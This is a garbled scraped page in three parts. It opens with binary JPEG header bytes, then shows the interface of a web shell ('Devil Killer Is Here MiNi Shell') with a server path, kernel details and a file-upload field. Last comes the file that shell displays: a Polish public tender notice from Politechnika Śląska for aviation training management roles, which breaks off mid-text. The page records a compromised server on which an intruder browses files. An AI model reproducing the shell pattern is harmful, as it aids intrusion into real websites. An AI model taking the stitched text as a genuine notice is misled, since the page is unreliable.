JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/0028062101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa związana z pełnieniem funkcji personelu nominowanego w Akademickim Ośrodku Szkolenia Lotniczego Politechniki Śląskiej – kierownictwo. Znak sprawy DZPZ.283.54.2025.AG </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Śląska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Akademicka 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 237-13-34</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">DZPZ@polsl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.polsl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa związana z pełnieniem funkcji personelu nominowanego w Akademickim Ośrodku Szkolenia Lotniczego Politechniki Śląskiej – kierownictwo. Znak sprawy DZPZ.283.54.2025.AG </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-311ead17-779b-447d-8803-4f87d3045d90</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00280621</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00002645/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.39 Usługa związana z pełnieniem funkcji personelu noninowanego w Akademickim Ośrodku Szkolenia Lotniczego Politechniki Śląskiej - kierownictwo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://polsl.ezamawiajacy.pl/app/login <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://polsl.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy Zakupowej<br/>Politechniki Śląskiej, zwanej dalej „Platformą” lub „Systemem”: https://polsl.ezamawiajacy.pl/app/login oraz poczty elektronicznej:<br/>DZPZ@polsl.pl, z tym zastrzeżeniem, że składanie ofert odbywa się wyłącznie za pośrednictwem Platformy. b) Korzystanie z Platformy Zakupowej przez Wykonawcę jest bezpłatne. Na Platformie znajduje się zakładka „Baza Wiedzy” zawierająca Instrukcje dla Wykonawców. c) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą tego rozwiązania teleinformatycznego pod nr tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 900-1700), e-mail: oneplace@marketplanet.pl d)Zamawiający określa niezbędne<br/>wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;  komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;  zainstalowana dowolna<br/>przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;  zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. e) Zamawiający określa informacje na temat<br/>kodowania i czasu odbioru danych: plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie,<br/>jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert. f) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny<br/>czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu. g) Oświadczenia,<br/>wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego za pośrednictwem Platformy, uważa się za dokumenty<br/>złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę. h) O terminie złożenia oferty decyduje czas pełnego przeprocesowania transakcji na Platformie. i) Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy Zakupowej wynosi do 2 GB. j) Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:  dokumenty w formacie .pdf zaleca się podpisywać formatem PAdES;  dopuszcza się podpisanie dokumentów w formacie innym niż .pdf, wtedy będzie wymagany oddzielny plik z podpisem; w związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem. k) Wykonawca może również przekazać ww. zawiadomienie, dokument lub oświadczenie (nie dotyczy oferty) na adres poczty elektronicznej Zamawiającego. Wykonawca, przekazując ww. zawiadomienie, dokument lub oświadczenie, żąda<br/>potwierdzenia dostarczenia wiadomości. Za datę przekazania zawiadomienia, dokumentu lub oświadczenia przyjmuje się datę otrzymania potwierdzenia dostarczenia wiadomości zawierającej ww. pliki/ załączniki z serwera pocztowego Zamawiającego. Maksymalny rozmiar plików przesyłanych za pośrednictwem poczty elektronicznej Zamawiającego wynosi 10 MB. l) Zastrzega się, że Zamawiający i Wykonawca w trakcie prowadzenia postępowania oraz realizacji umowy, na każdym jej etapie oraz w każdej<br/>formie komunikują się w języku polskim, przy czym dopuszcza się używanie w oświadczeniach, ofertach oraz innych dokumentach określeń obcojęzycznych w zakresie określonym w art. 11 ustawy z dnia 7 października 1999 roku o języku polskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZPZ.283.54.2025.AG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szef instruktorów szkolenia praktycznego (CFI) <br/>Zakres czynności na stanowisku Szefa instruktorów szkolenia praktycznego (CFI):<br/>	nadzór nad całością procesu szkolenia praktycznego w Ośrodku;<br/>	sporządzanie planów szkoleń praktycznych;<br/>	sporządzanie oceny efektywności szkolenia praktycznego;<br/>	zapewnienie spójności szkolenia lotniczego;<br/>	zapewnienie i kontrola zgodności prowadzonego szkolenia praktycznego z programem i obowiązującymi przepisami;<br/>	nadzór nad sprawami związanymi z bezpieczeństwem lotniczym i w przypadku wystąpienia odstępstw od przyjętych standardów powiadamianie Kierownika Szkolenia (HT) i podejmowanie kroków zaradczych;<br/>	bieżąca kontrola postępów w szkoleniu praktycznym (w tym loty sprawdzające);<br/>	nadzór nad prawidłowością prowadzonej dokumentacji wyszkoleniowej;<br/>	wnioskowanie do Kierownika Szkolenia o wystawienie zaświadczeń o odbyciu szkolenia praktycznego;<br/>	wnioskowanie do Kierownika Szkolenia o wyznaczanie szkolonemu instruktora prowadzącego;<br/>	wnioskowanie do Kierownika Szkolenia o wyznaczanie dla instruktorów - praktykantów instruktora nadzorującego;<br/>	planowanie i wykonywanie (w porozumieniu z Kierownikiem Szkolenia) lotów sprawdzających na zakończenie Zadania (mającymi na celu nadanie kwalifikacji pilotażowych lub uprawnienia), lub wyznaczanie odpowiedniego instruktora do tych lotów;<br/>	kontrola i ocena pracy podległych mu instruktorów;<br/>	wydawanie zezwoleń na zwiększenie liczby lotów w przypadku niezadowalających postępów w szkoleniu praktycznym;<br/>	wnioskowanie do Kierownika Szkolenia w sprawie przerwania szkolenia w wyniku braku postępów;<br/>	nadzór nad sprawami związanymi z bezpieczeństwem lotniczym i w przypadku wystąpienia odstępstw od przyjętych standardów powiadamianie Kierownika Odpowiedzialnego i podejmowanie kroków zaradczych;<br/>	bieżąca kontrola postępów w szkoleniu (w tym loty sprawdzające);<br/>	nadzór nad prawidłowością prowadzonej dokumentacji szkoleniowej;<br/>	kontrola przestrzegania czasu pracy i wypoczynku personelu lotniczego zatrudnionego <br/>w Akademickim Ośrodku Szkolenia Lotniczego Politechniki Śląskiej;<br/>	utrzymanie i doskonalenie własnych kwalifikacji lotniczych;<br/>­	Wykonawca, składając ofertę jednocześnie oświadcza, że:<br/>•	znany mu jest zakres i charakter zadań realizowanych w AOSL POLSL, opisanych <br/>w SWZ;<br/>•	wykonywanie przez niego zadań lotniczych w innych podmiotach (ATO, przewoźnik lotniczy, itp.) nie będzie kolidowało z realizacją zadań w AOSL POLSL. <br/>­	Wykonawca zobowiązany jest do opracowania Raportu z realizacji zadań w miesiącu. <br/>W raporcie należy wykazać zadania, oraz terminy, w których były wykonywane. Raport stanowi załącznik do FV/rachunku i podlega zatwierdzeniu przez Kierownika Szkolenia Ośrodka (HT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72224200-3 - Usługi w zakresie planowania zapewniania jakości systemu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szef instruktorów szkolenia teoretycznego (CTKI) <br/>Zakres czynności na stanowisku Szefa Instruktorów Szkolenia teoretycznego (CTKI):<br/>	nadzór nad całością procesu szkolenia teoretycznego w Ośrodku;<br/>	sporządzanie planu szkolenia teoretycznego;<br/>	organizowanie zastępstw za nieobecnych instruktorów szkolenia teoretycznego;<br/>	sporządzanie oceny efektywności szkolenia teoretycznego;<br/>	akceptowanie tematów prac kontrolnych, testów i pytań egzaminacyjnych;<br/>	zapewnienie i kontrola zgodności prowadzonego szkolenia teoretycznego z programem <br/>i obowiązującymi przepisami;<br/>	bieżąca kontrola postępów w szkoleniu teoretycznym;<br/>	nadzór nad prawidłowością prowadzonej dokumentacji szkolenia teoretycznego;<br/>	wnioskowanie do Kierownika Szkolenia o wystawienie zaświadczeń o odbyciu szkolenia teoretycznego;<br/>	kontrola i ocena pracy podległych mu instruktorów szkolenia teoretycznego;<br/>	wnioskowanie do Kierownika Szkolenia odnośnie składów komisji egzaminacyjnych dla przeprowadzenia egzaminów kończących szkolenia teoretyczne;<br/>	wnioskowanie do Kierownika Szkolenia odnośnie składów komisji egzaminacyjnych dla przeprowadzenia egzaminów KWT;<br/>	uzgadnianie z Kierownikiem Szkolenia procedur egzaminów poprawkowych;<br/>	wnioskowanie do Kierownika Szkolenia o przerwaniu szkolenia w wyniku braku postępów;<br/>	utrzymanie i doskonalenie własnych kwalifikacji lotniczych;<br/>	Szef instruktorów szkolenia teoretycznego podlega bezpośrednio Kierownikowi Szkolenia;<br/>­	Wykonawca, składając ofertę jednocześnie oświadcza, że:<br/>•	znany mu jest zakres i charakter zadań realizowanych w AOSL POLSL, opisanych <br/>w SWZ;<br/>•	wykonywanie przez niego zadań lotniczych w innych podmiotach (ATO, przewoźnik lotniczy, itp.) nie będzie kolidowało z realizacją zadań w AOSL POLSL. <br/>­	Wykonawca zobowiązany jest do opracowania Raportu z realizacji zadań w miesiącu. W raporcie należy wykazać zadania, oraz terminy, w których były wykonywane. Raport stanowi załącznik do FV/rachunku i podlega zatwierdzeniu przez Kierownika Szkolenia Ośrodka (HT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72224200-3 - Usługi w zakresie planowania zapewniania jakości systemu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kierownik Procedur i Projektów Lotniczych (KPPL)<br/>Zakres czynności na stanowisku Kierownika ds. Procedur i Projektów Lotniczych (KPPL):<br/>	opracowywanie dokumentów związanych z realizacją procedur pozyskiwania usług szkoleniowych na potrzeby Akademickiego Ośrodka Szkolenia Lotniczego;<br/>	współudział w procesie nadzorowania prawidłowości funkcjonowania Systemu Zarządzania Akademickiego Ośrodka Szkolenia Lotniczego;<br/>	opracowywanie dokumentacji związanej z planowaniem i realizacją procesu zakupu techniki lotniczej na potrzeby Akademickiego Ośrodka Szkolenia Lotniczego; <br/>	opracowywanie dokumentacji związanej z zakupami pomocy naukowo-dydaktycznych na potrzeby Centrum Kształcenia Kadr Lotnictwa Cywilnego Europy Środkowo-Wschodniej;<br/>	zlecanie i nadzorowanie wykonywania procesów naprawczych, realizowanych w ramach Ośrodkach ATO POLSL;<br/>	udział w opracowywaniu planów pozyskiwania zgodności i pracach Rady ds. Bezpieczeństwa;<br/>	opracowywanie dokumentacji związanej z planowaniem i realizacją przedsięwzięć promocyjnych oraz eventów o charakterze lotniczym;<br/>	współudział w opracowywaniu aktualizacji i poprawek do dokumentacji lotniczej <br/>i operacyjnej Akademickiego Ośrodka Szkolenia Lotniczego;<br/>	współudział w opracowywaniu rekomendacji dotyczących działań korygujących funkcjonowanie Akademickiego Ośrodka Szkolenia Lotniczego;<br/>	współudział w organizacji i prowadzeniu szkoleń personelu, w zakresie organizacji <br/>i funkcjonowania Ośrodka, w myśl obowiązujących przepisów prawa lotniczego;<br/>­	Wykonawca, składając ofertę jednocześnie oświadcza, że:<br/>•	znany mu jest zakres i charakter zadań realizowanych w AOSL POLSL, opisanych <br/>w SWZ;<br/>•	wykonywanie przez niego zadań w innych podmiotach (ATO, przewoźnik lotniczy, itp.) nie będzie kolidowało z realizacją zadań w AOSL POLSL. <br/>­	Wykonawca zobowiązany jest do opracowania Raportu z realizacji zadań w miesiącu. W raporcie należy wykazać zadania, oraz terminy, w których były wykonywane. Raport stanowi załącznik do FV/rachunku i podlega zatwierdzeniu przez Kierownika Szkolenia Ośrodka (HT). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79420000-4 - Usługi związane z zarządzaniem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72224200-3 - Usługi w zakresie planowania zapewniania jakości systemu</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kierownik Jakości Part-147<br/>Zakres czynności na stanowisku Kierownika Jakości Part-147:<br/>	zapewnienie jakości i monitorowania zgodności w OSMOT Part- 147;<br/>	nadzorowanie prawidłowości funkcjonowania Systemu Zarządzania Jakością <br/>w Organizacji;<br/>	stałe doskonalenie QMS;<br/>	realizacja audytów wewnętrznych organizacji, zgodnie z rocznym planem;<br/>	realizacja audytów zewnętrznych w odniesieniu do organizacji lotniczych realizujących zadania na korzyść Ośrodka Part-147;<br/>	zlecanie i nadzorowanie wykonywania procesów naprawczych, realizowanych w ramach Ośrodka Part-147;<br/>	objęcie Systemem Zarządzania Jakością monitorowanie zgodności wszystkich wymagań, <br/>a w przypadku dużej złożoności zadań kierowanie wyszkolonym personelem lub audytorem zewnętrznym;<br/>	rekomendacja sposobów działań korygujących oraz monitorowanie ich realizacji <br/>i raportowanie;<br/>	zapewnienie niezależności funkcji monitorowania zgodności wyrażającą się w tym, że audity i inspekcje w Ośrodku Part-147, są wykonywane przez personel nieponoszący odpowiedzialności za obszary będące przedmiotem auditu;<br/>	odpowiedzialność za organizację szkoleń personelu Ośrodka Part-147, w zakresie organizacji i funkcjonowania Ośrodka Part-147, w myśl 